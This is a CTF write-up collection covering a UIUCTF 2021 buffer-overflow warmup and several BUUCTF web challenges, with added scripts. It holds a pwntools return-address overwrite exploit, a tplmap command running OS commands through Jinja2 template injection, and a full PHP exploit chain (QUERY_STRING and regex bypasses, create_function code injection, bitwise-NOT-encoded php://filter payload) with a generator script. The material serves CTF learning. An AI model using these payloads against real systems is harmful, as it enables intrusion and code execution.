UIUCTF 2021

pwn

Pwn Warmup

exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/8/1 10:01
# @Author : upload
# @File : Pwn Warmup.py
# @Software: PyCharm


# &give_flag = 0x80485ab   (line printed by the service)


from pwn import *

context(os="linux", arch="i386", log_level="debug")  # 32-bit target

content = 0  # 1 = local ./challenge, anything else = remote

# give_flag = 0x80485ab   (local, non-PIE build)
give_flag = 0x565b72ad   # hard-coded: the remote address differs on every connection


def main():
    try:
        if content == 1:
            upload = process("./challenge")
        else:
            upload = remote("pwn-warmup.chal.uiuc.tf", 1337)
    except Exception:
        print("[!!] The exp could not start/connect, check `content` ~")
        return

    # 0x10-byte buffer + 4-byte saved ebp, then the saved return address
    payload = b'a' * (0x10 + 4)
    payload = payload + p32(give_flag)
    print(payload)
    upload.recvuntil(b"&give_flag = ")  # service leaks give_flag's address first
    upload.recvline()                   # consume the (varying) address
    upload.sendline(payload)
    upload.interactive()


main()

Couldn't get it to work! When connecting remotely, the give_flag address keeps changing!

Things move too fast! Forget it! Let's grind some other challenges!
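Since the service prints the `&give_flag = 0x...` line the script above waits for, the address can be parsed from that leak on every connection instead of being hard-coded. This is an added example, not the writeup's exploit; it assumes the leak line has exactly that format and keeps the writeup's 0x10 + 4 offset. The sample banner is constructed, and the live pwntools wiring under `__main__` is not run by default.

```python
import re
import struct

RET_OFFSET = 0x10 + 4  # 0x10-byte buffer + 4-byte saved ebp (from the exploit above)

# Constructed sample banner in the format the service prints. The real value
# differs on every connection because the remote binary is position independent.
SAMPLE_BANNER = b"&give_flag = 0x565b72ad\n"


def parse_give_flag(banner):
    """Extract give_flag's address from the leak line (assumed format: '&give_flag = 0x...')."""
    m = re.search(rb"&give_flag\s*=\s*0x([0-9a-fA-F]+)", banner)
    if m is None:
        raise ValueError("no give_flag leak in banner: %r" % banner)
    return int(m.group(1), 16)


def build_payload(give_flag):
    """Pad up to the saved return address and overwrite it (32-bit little-endian)."""
    return b"a" * RET_OFFSET + struct.pack("<I", give_flag)


def exploit_from_banner(banner):
    """Leak line in, ready-to-send payload out."""
    return build_payload(parse_give_flag(banner))


if __name__ == "__main__":
    # Live use with pwntools (hypothetical wiring, not executed here).
    from pwn import remote

    io = remote("pwn-warmup.chal.uiuc.tf", 1337)
    io.recvuntil(b"&give_flag")
    leak = b"&give_flag" + io.recvline()
    io.sendline(exploit_from_banner(leak))
    io.interactive()
```

The payload is identical to the script's (20 bytes of padding plus the packed address); only the source of the address changes, which is exactly what a PIE binary with a built-in leak requires.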

BUUweb

[WUSTCTF2020]CV Maker

Knowledge point: backend RCE

What is this! Register, then upload a file in the backend and get a shell! No filtering at all! Speechless!

[RootersCTF2019]I_<3_Flask

Knowledge point: template injection

  1. Jinja2 template injection
  2. Arjun, a parameter brute-forcing tool
  3. tplmap, a template injection tool

Two tools, solved in seconds!

PS G:\buuctf工具\Arjun-2.0-beta> python3 arjun.py -u http://e7cf1be7-69c9-461b-85fe-14b9f1f1273a.node4.buuoj.cn/ -m GET -c 200 --stable
python  tplmap.py -u 'http://e7cf1be7-69c9-461b-85fe-14b9f1f1273a.node4.buuoj.cn/?name=1*' --os-cmd  whoami
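The sink those two tools find and exploit, as an added example that is not part of the original writeup or of the challenge's code: a Jinja2 template whose source is built from user input (the `name` parameter Arjun found), next to the fixed version, plus the `{{7*7}}` probe tplmap starts with and the object traversal its RCE payloads build on. It assumes Jinja2 is installed; the function names are mine.

```python
from jinja2 import Environment

SSTI_PROBE = "{{ 7*7 }}"  # arithmetic probe: evaluated output differs from the input


def render_vulnerable(name):
    """User input is spliced into the template *source*, so Jinja2 evaluates it."""
    template_source = "Hello " + name + "!"
    return Environment().from_string(template_source).render()


def render_safe(name):
    """Template source is fixed; user input only ever arrives as a variable."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}!").render(name=name)


def is_ssti(render, probe=SSTI_PROBE, expected="49"):
    """Scanner-style check: the probe was evaluated if its result (not its text) is reflected."""
    try:
        out = render(probe)
    except Exception:
        return False
    return expected in out and probe not in out


# First step of the usual Jinja2 RCE chain: walk from a str literal to `object`,
# from which subclasses (and eventually os/popen) are reached.
TRAVERSAL_PROBE = "{{ ''.__class__.__mro__[1].__name__ }}"

if __name__ == "__main__":
    for label, fn in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        print("%s: %r -> SSTI=%s" % (label, fn(SSTI_PROBE), is_ssti(fn)))
    print("traversal:", render_vulnerable(TRAVERSAL_PROBE))
```

`?name=1*` in the tplmap command marks exactly this injection point; the fixed handler returns the probe text unevaluated, which is what tplmap reports as "not injectable".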

[BJDCTF2020]EzPHP

Knowledge point: PHP code audit

This challenge is pretty good!

But I got it working locally and not remotely!?????

Speechless!

Working notes for the payload: each parameter in raw form, then fully percent-encoded so the keywords never appear literally in QUERY_STRING.

debu=aqua_is_cute
%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a

shana[]=1
%73%68%61%6e%61%5b%5d=1
passwd[]=2
%70%61%73%73%77%64%5b%5d=2

file=data://text/plain,debu_debu_aqua
file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61

flag[code] = !!
%66%6c%61%67%5b%63%6f%64%65%5d=!!

flag[code] = create_function
&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e
flag[arg] = ;}var_dump(get_defined_vars());//


flag[arg] =;}var_dump(require(~(%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F)));//

&%66%6c%61%67%5b%61%72%67%5d=;}var_dump(require(~%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//

&%66%6c%61%67%5b%61%72%67%5d=;}var_dump(require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f)));//


&%66%6c%61%67%5b%61%72%67%5d=%3b%7d%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f



POST:

debu=__&file=!!

file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%73%68%61%6e%61%5b%5d=1&%70%61%73%73%77%64%5b%5d=2&


file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0A&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2



require(~%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F)
bitwise NOT of every byte gives: pHp://FilTer/convert.base64-encode/resource=rea1fl4g.php

require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f))
bitwise NOT of every byte gives: php://filter/read=convert.base64-encode/resource=rea1fl4g.php


flag{Congratulations!Y0u_Get_thE_rea1f1114g}
http://47.94.0.250:3000/1nD3x.php
?file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61
&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a
&%73%68%61%6e%61%5b%5d=1
&%70%61%73%73%77%64%5b%5d=2
&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e
&%66%6c%61%67%5b%61%72%67%5d=;}var_dump(require(~%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//

https://www.cnblogs.com/rabbittt/p/13323155.html

1 Bypassing the check on QUERY_STRING: $_SERVER['QUERY_STRING'] is never URL-decoded, while $_GET is, so fully percent-encoding the parameter names and values hides the keywords from the check and PHP still sees the real values.

2 preg_match('/^...$/') is bypassed with a trailing newline (%0a): without the D modifier, $ also matches right before a final "\n", so the regex still matches even though the value is not byte-identical to the expected string.

3 $_REQUEST bypass: when the same name is present in both GET and POST, $_REQUEST takes the POST value (default request_order = "GP"), so the POST body can carry different values for the same names.

4 file_get_contents() is satisfied with the data:// wrapper: data://text/plain,debu_debu_aqua returns exactly debu_debu_aqua.

5 $code and $arg are controllable, so $code('', $arg) becomes create_function('', $arg): the argument ;}...// closes the generated function body early and the rest runs as arbitrary PHP. The require() argument is written as ~ applied to a byte string (bitwise NOT of php://filter/read=convert.base64-encode/resource=rea1fl4g.php), so the wrapper string never appears literally in the request.
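The encodings in the scratch notes above, reproduced by a small script so they can be generated and checked rather than hand-typed. This is an added example, not part of the writeup or of the challenge; it only implements the five points listed (full percent-encoding for QUERY_STRING, the %0a suffix, data://, the bitwise-NOT wrapper string and the create_function argument). The array bypass of the sha1 comparison and the harmless POST values are assumptions from the shana[]/passwd[] parameters and from point 3; function names are mine.

```python
WRAPPER = "php://filter/read=convert.base64-encode/resource=rea1fl4g.php"


def percent_encode_all(s):
    """Percent-encode every byte. $_SERVER['QUERY_STRING'] is never URL-decoded,
    so keywords (debu, flag, ...) are not found there, while $_GET decodes them."""
    return "".join("%%%02x" % b for b in s.encode())


def php_not_encode(s):
    """Percent-encode the bitwise NOT of every byte: PHP's ~ on a string flips
    each byte back, so require(~"...") rebuilds the wrapper at runtime and the
    characters of php://filter never appear literally in the request."""
    return "".join("%%%02x" % ((~b) & 0xFF) for b in s.encode())


def php_not_decode(encoded):
    """Inverse of php_not_encode: the string PHP sees after applying ~."""
    raw = bytes(int(h, 16) for h in encoded.lstrip("%").split("%"))
    return bytes((~b) & 0xFF for b in raw).decode()


def build_get_params():
    """GET side of the exploit, in the order of the final URL in the notes above."""
    return [
        # point 4: file_get_contents($file) must yield 'debu_debu_aqua'
        (percent_encode_all("file"), percent_encode_all("data://text/plain,debu_debu_aqua")),
        # point 2: ^...$ still matches with a trailing newline
        (percent_encode_all("debu"), percent_encode_all("aqua_is_cute\n")),
        # assumed: arrays make the sha1() comparison pass while the values differ
        (percent_encode_all("shana[]"), "1"),
        (percent_encode_all("passwd[]"), "2"),
        # point 5: $code('', $arg) == create_function('', $arg)
        (percent_encode_all("flag[code]"), percent_encode_all("create_function")),
        (percent_encode_all("flag[arg]"),
         ";}var_dump(require(~(" + php_not_encode(WRAPPER) + ")));//"),
    ]


def build_query():
    return "&".join("%s=%s" % (k, v) for k, v in build_get_params())


def build_post_override(names, value="1"):
    """Point 3 (assumed use): same names in the POST body so $_REQUEST sees these
    values instead of the GET ones (default request_order = "GP")."""
    return "&".join("%s=%s" % (n, value) for n in names)


if __name__ == "__main__":
    print("GET  ?" + build_query())
    print("POST " + build_post_override(["file", "debu"]))
    print("~ decodes to:", php_not_decode(php_not_encode(WRAPPER)))
```

Both wrapper spellings from the notes decode cleanly: the upper-case variant is `pHp://FilTer/convert.base64-encode/resource=rea1fl4g.php` (PHP treats the scheme and filter names case-insensitively), the lower-case one is the canonical `read=` form.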

https://www.cnblogs.com/-chenxs/p/11459374.html

[GYCTF2020]EasyThinking

https://blog.csdn.net/mochu7777777/article/details/105160796

ThinkPHP v6.0.0~6.0.1 arbitrary file operation vulnerability analysis

http://j0k3r.top/2020/03/02/ThinkPHP_v6.0.0_ArbitraryFileWriting/#1-%E6%90%AD%E5%BB%BA%E7%8E%AF%E5%A2%83